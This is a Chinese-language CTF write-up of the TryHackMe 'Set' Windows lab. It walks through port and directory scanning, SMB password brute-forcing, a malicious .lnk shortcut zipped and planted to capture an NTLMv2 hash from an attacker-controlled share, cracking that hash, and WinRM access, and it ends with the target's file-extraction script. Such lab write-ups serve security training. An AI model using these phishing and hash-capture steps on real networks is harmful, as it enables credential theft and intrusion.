Set

端口扫描

root@ip-10-10-238-207:~# nmap -sTCV -p- --min-rate 1000 10.10.197.74

Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-18 16:04 GMT
Nmap scan report for ip-10-10-197-74.eu-west-1.compute.internal (10.10.197.74)
Host is up (0.00042s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=set.windcorp.thm
| Subject Alternative Name: DNS:set.windcorp.thm, DNS:seth.windcorp.thm
| Not valid before: 2020-06-07T15:00:22
|_Not valid after:  2036-10-07T15:10:21
|_ssl-date: 2023-11-18T16:07:28+00:00; -1s from scanner time.
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49666/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 02:15:C6:6F:AA:DF (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-18 16:07:30
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.96 seconds

80

在上面的扫描中我们发现了一个子域 seth.windcorp.thm 进行子域扫描但是没有发现接着进行目录的扫描也是没有什么结果

root@ip-10-10-171-114:~/set# gobuster dir -u https://set.windcorp.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://set.windcorp.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2023/11/19 01:19:53 Starting gobuster
===============================================================
/index.html (Status: 200)
/blog.html (Status: 200)
/assets (Status: 301)
/forms (Status: 301)
/appnotes.txt (Status: 200)
Progress: 196961 / 220561 (89.30%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/11/19 01:34:21 Finished
===============================================================

• 查看 /appnotes.txt 这个文件知道对应的用户密码很是薄弱, 因此可以进行暴力破解

之后查看网页的源代码发现其中存在一个 xml 文件, 访问这个文件发现其是一个用户文件, 从这里获取到对应的用户信息

SMB

利用收集到的用户文件进行暴力破解之后我们就可以得到一个账号

[+] 10.10.150.230:445     - 10.10.150.230:445 - Success: '.\myrtleowe:Passw@rd'
# 扫描时间很长不要浪费时间

root@ip-10-10-171-114:~/set# smbmap.py -H 10.10.150.230 -u myrtleowe -p 'Passw@rd'
                                                                                                    
[+] IP: 10.10.150.230:445	Name: windcorp.thm        	Status: Authenticated
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	E$                                                	NO ACCESS	Default share
	Files                                             	READ ONLY	
	IPC$                                              	READ ONLY	Remote IPC
root@ip-10-10-171-114:~/set# smbclient \\\\10.10.150.230\\Files -U myrtleowe%'Passw@rd'
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 16 22:08:26 2020
  ..                                  D        0  Tue Jun 16 22:08:26 2020
  Info.txt                            A      123  Tue Jun 16 22:57:12 2020

root@ip-10-10-171-114:~/set# cat Info.txt 
Zip and save your project files here. 
We will review them

从获取到得文件信息来看我们应该进行钓鱼操作, 因为服务端会审查我们的 ZIP 文件, 我们可以利用 mslink 来帮助我们创建钓鱼文件

root@ip-10-10-171-114:~/set# ./mslink_v1.2.sh -l notimportant -n shortcut -i \\\\10.10.171.114\\MichelleWat -o shortcut.lnk
Création d'un raccourci de type "dossier local" avec pour cible notimportant
root@ip-10-10-171-114:~/set# zip myfile.zip shortcut.lnk 

之后将压缩得文件进行上传就可以发现对应的文件被解压查看了之后开启监听我们就可以获取到一个对应的 hash,之后进行解密即可

[SMB] NTLMv2-SSP Client   : ::ffff:10.10.150.230
[SMB] NTLMv2-SSP Username : SET\MichelleWat
[SMB] NTLMv2-SSP Hash     : MichelleWat::SET:cfae055d4d1a6dc6:56CE2798F9A4918BB2E186333925EB8D:010100000000000000E84CA48F1ADA015F7250DE7A5CF96B0000000002000800410053004F004B0001001E00570049004E002D00410045004400320031004F00310032004F004400580004003400570049004E002D00410045004400320031004F00310032004F00440058002E00410053004F004B002E004C004F00430041004C0003001400410053004F004B002E004C004F00430041004C0005001400410053004F004B002E004C004F00430041004C000700080000E84CA48F1ADA0106000400020000000800300030000000000000000000000000200000CDCD3993F382BDC8905687652A0630C50F081443B5FB10E77EAB67BC9F632A350A001000000000000000000000000000000000000900240063006900660073002F00310030002E00310030002E003100370031002E003100310034000000000000000000
[*] Skipping previously captured hash for SET\MichelleWat
[*] Skipping previously captured hash for SET\MichelleWat

root@ip-10-10-171-114:~/set# john hash.txt --wordlist=`locate rockyou.txt`
Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl"
Use the "--format=ntlmv2-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!MICKEYmouse   (MichelleWat)
1g 0:00:00:21 DONE (2023-11-19 02:32) 0.04618g/s 662528p/s 662528c/s 662528C/s !!123sabi!!123..*7¡Vamos!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 
root@ip-10-10-171-114:~/set#

后渗透

MichelleWat

MichelleWat —> one

查看端口占用情况可以在其中发现一些特殊之处

*Evil-WinRM* PS C:\Users\MichelleWat\Documents> netstat -ao

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.10.150.230:2805     SET:49725              ESTABLISHED     760
  TCP    10.10.150.230:49725    SET:2805               ESTABLISHED     760
*Evil-WinRM* PS C:\> get-Process -Id 760

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    637      53    53396      72468               760   0 Veeam.One.Agent.Service
*Evil-WinRM* PS C:\Program Files\Veeam\Veeam ONE\Veeam ONE Agent> (Get-Item Veeam.One.Agent.Service.exe).versioninfo.fileversion
9.5.4.4566

经过搜查发现对应的程序存在反序列化漏洞veeam_one_agent_deserialization 可惜利用有点难度, 如果想要利用参考这篇文章 :[TryHackMe] Set — Write-up

扩展

靶机端的解压文件

*Evil-WinRM* PS C:\script> ls

    Directory: C:\script

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/15/2020  11:26 AM            336 fileviewer.cmd

*Evil-WinRM* PS C:\script> type fil*
@echo off
SET source="C:\Shares\Files"
SET extracted="C:\Shares\extracted"

powershell.exe -NoP -NonI -Command "Expand-Archive '%source%\*.zip' '%extracted%'"
FOR /f "tokens=*" %%G IN ('dir /s /b %extracted%\..\*.') DO (explorer %%G)

ping -n 3 127.1>NUL
taskkill /IM explorer.exe
rmdir %extracted% /q /s
del %source%\*.zip -j